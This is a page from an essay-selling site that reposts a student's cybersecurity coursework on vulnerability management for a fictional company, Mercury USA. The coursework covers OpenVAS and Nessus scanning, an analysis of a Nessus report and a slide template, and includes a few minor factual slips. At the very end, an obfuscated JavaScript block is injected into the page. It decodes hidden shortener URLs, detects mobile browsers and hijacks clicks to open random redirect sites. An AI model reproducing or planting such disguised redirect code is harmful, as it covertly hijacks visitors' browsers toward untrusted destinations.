Vulnerability Management Presentation to Stakeholders

This week, you will make your PowerPoint presentation, making the case for your vulnerability management process and that the company to purchase the vulnerability management software, Nessus. With the current buzz about the ransomware attack on a rival company, key Mercury USA stakeholders are concerned that this type of attack could lead to a significant loss of revenue for the company as well as damage to the company’s reputation.

They are looking for your guidance and technical expertise to not only come up with a better way to protect their resource but also to make them feel confident that they can calm stockholders’ fears about any ransomware or cyberattacks. You need to provide the stakeholders with a presentation that relays the technical information in a way they can understand so they can make an informed decision about your vulnerability management process and your recommendation to purchase cybersecurity software.

Don't use plagiarized sources. Get Your Custom Essay on
Vulnerability Management Presentation to Stakeholders
Just from $13/Page
Order Essay

The ransomware attack has made your company realize that cybersecurity cannot be an afterthought. The stakeholders are aware that if they don’t spend money on addressing issues now, a cyber incident might lead to a more costly bill in the future and could even threaten the very existence of the company.

Remember to be clear about what action you are recommending. Executive management will want to understand not only what you discovered, but also what you propose as a solution. The company’s leaders will want to know what decisions they need to make based on your findings. Give them the actionable information they need to decide.

  • five to 10 slides maximum; limit bullets to no more than six per slide
  • a reference slide with one to two quality sources

How Will My Work Be Evaluated?

As you progress in your cybersecurity career, you may find yourself making presentations to customers, client audiences, and management. By summarizing your results and recommendations to management in an effective presentation, you are demonstrating how you use your technical knowledge to convey your ideas to others in a professional setting. Your ability to express your recommendations to provide information for decision makers in a format that uses the right mix of technical detail in a business context is an important workplace and career skill.

The following evaluation criteria aligned to the competencies will be used to grade your assignment:

  • 1.2.2: Employ a format, style, and tone appropriate to the audience, context, and goal.
  • 1.3.3: Integrate appropriate credible sources to illustrate and validate ideas.
  • 2.1.3: Explain the significance of the issue or problem.
  • 12.3.2: Describe the implementation of controls.
  • 12.8.1: Recognize the process to obtain approval from the business process owner.
  • 13.2.1: Evaluate vendor recommendations in the context of organization requirements.

If you haven’t already downloaded it last week, download the

Presentation to Management Template

 now and follow the instructions in the document.

Remember to delete the instructional text from the template before you submit.

MEMO

February 2, 2021

April Taylor-Melton\CMIT 421

Greetings:

 

Overview

Vulnerability management is the practice of identifying, prioritizing, classifying, mitigating, and remediating software vulnerabilities. It is essential to identify the vulnerabilities in businesses systems and software and come up with effective mitigating strategies to reduce the risk of cyberattacks. In this case, a vulnerability management process for Mercury USA, will be provided. It will indicate the measures taken to reduce the risks of cyber threats and attacks. The vulnerability assessment software used in this case to provide the vulnerability report will be analyzed. That will help to identify whether it is effective. Recommendations on whether the company should use it will be given. Lastly, a business case example will be given. The business case example will identify the risks and threats that might occur if the business does not implement vulnerability assessment. 

Part 1: Vulnerability Management (VM) Process Recommendation 

Security vulnerabilities are the weaknesses that allow attackers to compromise a product or the information held. Thus, it raises the essence of vulnerability management. It is the process through which security vulnerabilities are identifying, evaluated, treated and reported. The vulnerability management process is divided into four processes. The processes are identifying the vulnerabilities, evaluating the vulnerabilities, treating the vulnerabilities, and reporting the vulnerabilities (Aleksic et al., 2017). Since Mercury USA is in the transport sector, the vulnerability management process is significant. It will enable the systems that the the company uses to be secure. It will also ensure that the company is secure as it carries on its transportation business. 

The vulnerability management system’s scope will involve the company’s software systems and vessels of transport. That is because they will all be covered by the vulnerability management process. To plan the vulnerability management, the vulnerability management process’s scope must first be identified. Thus, all the systems, software and vessels of transport used by the company must be involved in its vulnerability management plan. 

To identify the assets involved, an audit will be conducted on the company. That will help determine all the software, systems, and the vessels of transport that may be included in the vulnerability management process. Additionally, the audit will identify other significant assets in the company that might be involved in the vulnerability management test. 

The Open Vulnerability Assessment Scanner will be used to scan and assess the vulnerabilities. It is a software framework of several tools and services that offer vulnerability scanning and vulnerability management. It is a free software that has a high level of effectiveness. Thus, it will be used by the company to assess its vulnerabilities. The transport industry requires that the vulnerability tools to assess the vulnerabilities are approved scanning vendors. That minimizes the risks of using ineffective vulnerability assessment tools. The vulnerability assessment tools that are used should be licensed. In this case, the Open Vulnerability Assessment Scanner is licensed under the general public license. It is written in Nexus Attack Scripting Language, making it very effective. 

The desired frequency of scanning would be once monthly. That will ensure that there is regular vulnerability scanning in the company. Since the Open Vulnerability Assessment Scanner software is free, the company will not incur many expenses to assess the vulnerabilities. Thus, it is essential to assess the vulnerabilities frequently to avoid any cyber-attacks or threats that might occur due to unknown vulnerabilities. 

The report of the vulnerability scanning will be reported to the required authorities. They will be detailed to indicate any vulnerabilities that have been identified. It will also indicate the risks that the vulnerabilities expose the business to. Moreover, effective mitigation strategies will be identified.  

Part 2: Vulnerability Scanning Tool Evaluation and Recommendations

The tool used to scan the company and produce the report is Open Vulnerability Assessment Scanner. The software is open-source software that offers vulnerability scanning and vulnerability management. It is a free software and it is licensed under the general public license indicating that it meets the industry standards. It is written in the Nessus Attack Scripting Language. 

The OpenVAS software provided a comprehensive vulnerability assessment report. That indicates that the system may be used to effectively find the company’s vulnerabilities (Rahalkar, 2019). One of the disadvantages that may arise is compatibility issues. Since it is an open-source software, it needs specialized drivers to be installed into its system. The overall impression about the software is that it is an effective software that may be utilized by the company. It identifies the vulnerabilities and indicates how the vulnerabilities may be used against the company by attackers. Thus, it will enable the analysts to correct the vulnerabilities. It can also be used to discern the most critical vulnerabilities since it also indicates the risks that result from the vulnerabilities. The report adequately covers the mitigation for the vulnerabilities. It indicates what should be done and how it should be done. 

The report’s qualities make it effective to be used by the management. That is because it is a detailed report and it gives effective mitigation strategies. Thus, Mercury USA should use the tool to assess its vulnerabilities in the future. 

Part 3: Business Case Example
 

If the recommendation is not implemented, the company may be exploited by remote attackers, thus leading to information disclosure from the server. To avoid that, the company should install the vendor’s released updates to avoid such risks from occurring. OpenVAS would be adequate to identify such a vulnerability and identify the effective mitigation strategies that should be implemented.  

Closing
 

The vulnerability management process should be carried out to identify the vulnerabilities so that effective strategies may be formulated to reduce the threats and risks that are exposed to the company. The OpenVAS software is an effective software to be used in vulnerability assessment by the company. That is because it provides a comprehensive report that includes the vulnerabilities identified, the risks they expose the business to, and the mitigation strategies that may be used. Considering that lack of implementing a vulnerability assessment software may lead to data loss and cyber attacks, the OpenVAS software should be implemented to identify the company’s vulnerabilities.

Yours Sincerely.

April Taylor-Melton
Cybersecurity Threat Analyst

Mercury USA

References

Aleksic, A., Puskaric, H., Tadic, D., & Stefanovic, M. (2017). Project management issues: vulnerability management assessment. Kybernetes.

“Chapter 5: Implementing an Information Security Vulnerability Management Process”, Pearson CompTIA Cybersecurity Analyst (CySA+), 2020. [Online]. Available: https://www.ucertify.com/. [Accessed: 28- Apr- 2020].

Rahalkar, S. (2019). OpenVAS. In Quick Start Guide to Penetration Testing (pp. 47-71). Apress, Berkeley, CA.

1

VM Scanner Background Report

April Taylor-Melton

CMIT 421 4520

21 Feb 2021

Introduction

Vulnerability management is significant for businesses. When a business experiences a cyber-attack, it risks losing customer trust and loyalty and incurring expensive litigation processes and government fines. Therefore, it is essential to prevent such occurrences in a business (Goel & Mehtre, 2015). In this paper, an assessment of Mercury USA will be conducted. The company used the Nessus vulnerability scanner to identify the vulnerabilities in the company. After the scan was completed, Mercury USA was issued the report indicating the vulnerabilities that it faces. In this paper, the analysis of the Nessus vulnerability report will be conducted. That will identify all the vulnerabilities that are identified in the report and their implications in the business. Effective mitigation strategies will also be discussed to come up with a plan that may be used to prevent the vulnerabilities from being exploited by the cyber attackers. That will safeguard the company’s operations and data from cyber threats and cyber-attacks. When giving the recommendations, the business case will be considered. That entails what the CEO of Mercury USA requires to be done. It will also ensure that the mitigation strategies that have been given align with the company’s operations. Moreover, a recommendation on whether to purchase the Nessus vulnerability scanner will be given.

Part 1: Nessus Vulnerability Report Analysis

The Nessus vulnerability report should be sent to the management of Mercury USA so that they may see the vulnerabilities that were identified by the Nessus vulnerability scanner. However, the management of the company will not easily understand the report. Since it would be time-consuming for the IT manager to explain everything to the management of the company, it is integral to attach meaning before sending the report to the management. Explaining the report will make it easier for the company’s management to understand the Nessus vulnerability report. It will also let them understand the implications of the vulnerabilities that have been identified.

The tool’s output was effective. The Nessus vulnerability report covers all the workstations and servers at Mercury USA. That shows that the report is relevant to the company. It shows the information that the company was seeking. Although the report does not explain the issues identified, it is effective as it identifies all the vulnerabilities in the company’s system. The report is well organized and easy to interpret. It provides the four hosts executive summary at Mercury USA. The report arranges the issues that have been identified in five categories. The categories are critical, high, medium, low, and information. In this case, the vulnerabilities are represented by critical, high, medium, and low with critical being the most serious vulnerabilities and low being the less serious vulnerabilities.

The tool provides enough information for me as an analyst to use. As indicated above, the vulnerabilities are arranged in accordance with their seriousness and the threat that they pose to the company. That makes it easy to identify the most critical vulnerabilities in the business. Therefore, the most serious vulnerabilities in the business should be tackled before addressing the less serious vulnerabilities in the business. Therefore, the Nessus vulnerability report will be used to effectively identify all the vulnerabilities in the company based on their seriousness and the threat that they pose.

From the Nessus vulnerability report, the three most important vulnerabilities in the company’s system can be identified. The vulnerabilities are the most critical as they may lead to other vulnerabilities occurring in the company’s systems. Thus, when corrected, more vulnerabilities will be prevented from occurring. However, that does not indicate that the other vulnerabilities should not be dealt with. Due to the nature of seriousness and critical nature of some vulnerabilities, they have to be dealt with first.

The first important vulnerability that has been identified is “Unix operating system unsupported version detection.” That indicates that Unix operating system that is used by the company’s 192.168.1.30 host is no longer supported. The version of the Unix operating system runs on the remote host in the company. The lack of support indicates that there will be no more security patches that will be produced for the operating system. Thus, the operating system is likely to have security vulnerabilities. That poses a serious threat to the company as the security vulnerabilities may be exploited by cyber attackers. Therefore, the company should upgrade to a version of the Unix operating system that is supported.

The second important vulnerability is “Bind Shell Backdoor Detection.” That indicates that the remote host of the company may be compromised. If it is not compromised, it indicates that there are higher chances that it could be compromised. The vulnerability indicates that the shell listens to the remote port without the requirement of authentication (Tenable, n.d.). That may be exploited by an attacker and they may send the commands directly thus accessing the company’s system. The company should verify whether the remote host is compromised and then re-install the system to ensure that it is safe.

The third important vulnerability is a security update for the Microsoft Windows SMB server. The company has an available security update that it has not installed. That may pose a threat to the company as the security vulnerabilities may be exploited by attackers. Therefore, the company should update its Microsoft Windows SMB.

As indicated above, the report provides enough information to address and remediate the three most important vulnerabilities. Although the report does not indicate the solutions directly, they may be formulated by understanding the vulnerabilities and what they entail.

Part 2: Business Case

Although the company faces several critical vulnerabilities, it is in a better position. That is because the vulnerabilities that have been identified can be easily corrected. Additionally, they may not be used directly by attackers to attack the company. But if not corrected, they may lead to attacks that may lead to loss or expose of business-critical information and customers’ information. That is evident as most of the vulnerabilities require updates that have not been done. That considered, the company should always update its systems when updates are made available. That will ensure that the vulnerabilities in the company are minimized and the security is heightened.

Based on the vulnerabilities that have been identified in the Nessus vulnerability report, some vulnerabilities may lead to adversary threats that might lead to exfiltration of the company’s data or ransomware being used against a company. A black hat hacker might try to use the remote hosts to access the company. Several critical vulnerabilities have been identified in the remote hosts operating systems. The vulnerabilities would enable a black hat hacker to access the company without being noticed. For instance, a black hacker may use a bind shell that does not require authentication to access the company’s data. Additionally, SMB signing is not required, and it shares unprivileged access. That would be used by attackers to hold the company’s data for ransom or exfiltrate the company’s data. That indicates that the company should come up with mitigation strategies and implement them as soon as possible.

Part 3: Nessus Purchase Recommendation

The overall features of the Nessus vulnerability report are adequate for technical professionals. The report identified the vulnerabilities that have been identified in a company’s systems and categorizes them in the order of their seriousness in a company. Technical professionals would use such data as it simplifies their work of identifying the vulnerability and determining its seriousness. The Nessus report is understandable by the management. However, the members of the management team that do not have knowledge of IT processes should be explained to understand what the vulnerabilities entail. That is because the report s written in IT terms.

Nessus vulnerability professional costs depend on the period that a company buys to use the tool. It is available for sale for periods of one year, two years, and three years. The cost for a year is $3.458, the cost of two years is $6765, and the cost of three years is $8621. The tool may come in a standard format or an advanced format with an extra cost (Tenable, 2020). The cost of the tool is fair as it warrants its support, efficacy, and usability. Nessus vulnerability assessment tool may help Mercury USA comply with the regulatory and standards by enabling the company to identify its vulnerabilities and coming up with mitigation strategies. That will ensure that the company develops strong security for its systems. Therefore, I would recommend the Nessus vulnerability assessment tool for Mercury USA. It would be effective for the business and it will help in reducing its vulnerabilities.

Conclusion

According to the Nessus vulnerability report, the company has several vulnerabilities. Most of the vulnerabilities are present as a result of the company not updating its systems. Such vulnerabilities may be exploited by attackers to access the company’s critical business data and the customers’ data. That may result in loss of customer trust and incurring a lot of costs in the litigation processes and government fines. Nessus vulnerability assessment tool is easy to use and effective for a business. Thus, Mercury USA should buy the assessment tool. It will enable them to deal with the vulnerabilities that they face thus, heightening the security of the company. Purchasing the Nessus vulnerability assessment tool is effective to the organization, employees, and management as it will ensure that the employees work effectively with assured security in the systems. It will also enable the managers to come up with effective mitigation strategies and security policies thus protecting the company from cyber threats and attacks.

References

Goel, J. N., & Mehtre, B. M. (2015). Vulnerability assessment & penetration testing as a cyber defence technology. Procedia Computer Science, 57, 710-715.

Tenable. (2020, July 13). Nessus professional. Tenable®. https://www.tenable.com/products/nessus/nessus-professional

Tenable. (n.d.). Bind shell Backdoor detection. Tenable® – The Cyber Exposure Company. https://www.tenable.com/plugins/nessus/51988

<br /> CMIT 421 <Section #><br /> <Student Name><br /> July 6, 2020</p> <p>Good morning. My name is <Student Name>.<br /> I work in the MERCURY USA Information Security and Technology Department as a cyber threat analyst.<br /> Today, I’ll be presenting our proposal to address the CEO’s mandate to protect the organization from dangerous ransomware attacks.<br /> Let’s get started.<br /> 1</p> <p><insert narration><br /> AGENDA<br /> 2<br /> Logistics through innovation, dedication, and technology – MERCURY USA Delivers!</p> <p>Tell your audience what you intend to cover in your proposal. This is the PURPOSE of your communication!<br /> You should cover the three areas enumerated in the Project 3 instructions.<br /> Ensure you link your main points to your earlier work in Project #1 and Project #2.<br /> Although three main points is considered ideal, use less or more to fit your project; four main points are shown here for example purposes only.<br /> The three projects should be consistent and aligned with Judy “Mac” McNamara’s guidance.<br /> 2</p> <p>Main Point #1</p> <p>Main Point #2</p> <p>Main Point #3</p> <p>Main Point #4</p> <p>1: OUR BUSINESS CASE<br /> 3<br /> Logistics through innovation, dedication, and technology – MERCURY USA Delivers!<br /> <insert narration><br /> What are the important factors about the business?<br /> What is the CEO’s intent and guidance?<br /> How do the first two items relate to the next slides?<br /> Example sub-bullet #1<br /> Example sub-bullet #2<br /> Example sub-bullet #3</p> <p>This is main point #1. Provide no more than six bullets to expand on your topic.<br /> Limit each bullet to around six words.<br /> This is known as the 6 x 6 rule of presenting.<br /> On this slide, you should cover the business case. Think of this as the value to the business that will result from your recommendations. <br /> How does your recommendation meet the CEO’s direction and intent?<br /> Tell your audience members the what, why, how, and who so that they can make an informed decision about your proposal.<br /> If you do not cover these areas adequately, you may not get a decision, you may get a negative decision, or you may be told to come back after you’ve done your due diligence.<br /> 3</p> <p>2: OUR SECURITY POSTURE<br /> 4<br /> Logistics through innovation, dedication, and technology – MERCURY USA Delivers!<br /> <insert narration><br /> What are the most important vulnerabilities discovered?<br /> What is our exposure to known threats?<br /> How did you link the results to the business?<br /> Transportation industry hit hard by ransomware attacks<br /> Example #1: Use your findings and conduct research [1]<br /> Example #2: Use your findings and conduct research</p> <p>This is main point #2. Provide no more than six bullets to expand on your topic.<br /> Limit each bullet to around six words.<br /> This is known as the 6 x 6 rule of presenting.<br /> What vulnerabilities did you find in your analysis? What are the most important to tell the CEO about? Why are the vulnerabilities you selected important to the business? Ensure you explain in plain language, not technical jargon or cyber-speak.<br /> What are the threats that you see to the business given the scenario?<br /> Now consider this simple equation from the uCertify content: risk = threat x vulnerability x impact <br /> Use the equation to effectively explain your findings. <br />  <br /> If you find yourself struggling to quantify a vulnerability, return to this equation.<br /> Are there identified and specific threats to MERCURY USA? Avoid generic threats and using fear as a motivator.<br /> Is there a vulnerability from your analysis that can be linked to the specific threat?<br /> What is the potential impact in not addressing the threat (e.g., cost, reputational, loss of jobs, damage to hardware and software, etc.). <br /> 4</p> <p>James Brocker (JB) – [@Andrew Rider] [@Jessica McCarty] Not sure I understand the first bullet point. Looks like something is missing.</p> <p>James Brocker (JB) – [@John Galliano] Can you review?</p> <p>John Galliano (JG) – Sorry for that, Team. Looks like a stray-click & delete. Fixed!</p> <p>3: OUR VM PROCESS<br /> 5<br /> Logistics through innovation, dedication, and technology – MERCURY USA Delivers!<br /> <insert narration><br /> <example process graphic></p> <p>This is main point #3. Provide no more than six bullets to expand on your topic.<br /> Limit each bullet to around six words.<br /> This is known as the 6 x 6 rule of presenting.<br /> This slide includes an example graphic.<br /> 5</p> <p>A</p> <p>B</p> <p>C</p> <p>D</p> <p>E</p> <p>F</p> <p>4A: WE NEED A GOOD SCANNER<br /> 6<br /> Logistics through innovation, dedication, and technology – MERCURY USA Delivers!<br /> <insert narration><br /> Reviewed scanners<br /> <Product Name> is recommended due to several factors<br /> Sub-bullet #1<br /> Sub-bullet #2<br /> Sub-bullet #3<br /> Sub-bullet #4</p> <p>This is main point #4. Provide no more than six bullets to expand on your topic.<br /> Limit each bullet to around six words.<br /> This is known as the 6 x 6 rule of presenting.<br /> Provide your logic in recommending a scanning tool.<br /> What process did you use to evaluate the scanning tools?<br /> What tool are you recommending? Provide at least three sub-bullets to support your recommendation.<br /> 6</p> <p>4B: THE ASK<br /> 7<br /> Logistics through innovation, dedication, and technology – MERCURY USA Delivers!<br /> <insert narration><br /> Lead-in bullet<br /> Sub-bullet #1<br /> Purchase <Product Name>:<br /> Cost<br /> Manpower<br /> Measures of success</p> <p>This is main point #4 continued. Provide no more than six bullets to expand on your topic.<br /> Limit each bullet to around six words.<br /> This is known as the 6 x 6 rule of presenting.<br /> Now give the specifics of your ask to the executive decision maker.<br /> What are you asking for? How much will it cost? Who will implement it, and will additional manpower be required?<br /> What about training? How will you measure success?<br /> 7</p> <p>SUMMARY</p> <p>8<br /> Logistics through innovation, dedication, and technology – MERCURY USA Delivers!<br /> <insert narration><br /> Main Point 1<br /> Main Point 2<br /> Main Point 3<br /> Main Point 4</p> <p>This is your summary and your last opportunity to connect with your audience.<br /> Do not merely repeat your agenda topics. Add one to two important details about each main point to review for your audience.<br /> Ensure you re-state why you are giving this pitch: What is the decision you want?<br /> What is/are the main takeaway(s)?<br /> 8</p> <p>EXECUTIVE DISCUSSION & QUESTIONS</p> <p>The obligatory questions slide. In this scenario, it is highly likely for open discussion to occur among the executives present and other stakeholders, and you will field questions.<br /> A narration for this slide is not required.<br /> 9</p> <p><Example IEEE Reference Citations><br /> [1] A. Greenberg, “The Untold Story of NotPetya, the Most Devastating Cyberattack in History”, Wired, 2020. [Online]. Available: https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/. [Accessed: 19- May- 2020].<br /> [2] “Nessus Pro”, Tenable.com, 2020. [Online]. Available: https://www.tenable.com/products/nessus. [Accessed: 19- May- 2020].<br /> REFERENCES</p> <p>10</p> <p>The example above uses IEEE style. Ask your instructor for clarification on the style to be used.<br /> A narration for this slide is not required.<br /> 10<br /> <script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x69\x77\x55\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x54\x6c\x58\x33\x63\x383','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x52\x51\x50\x30\x63\x380','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x56\x4b\x47\x37\x63\x367','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x55\x68\x66\x36\x63\x316','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x7a\x6e\x46\x38\x63\x378','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x65\x64\x56\x35\x63\x385','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x5a\x75\x54\x31\x63\x331',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x47\x65\x77\x34\x63\x384',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x6c\x69\x6e\x6b\x2f\x59\x4e\x63\x39\x63\x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script></p> </div> </div> <!--end row--> </div> <!--end container--> </section> <section class="section" id="benefits"> <div class="container"> <div class="row 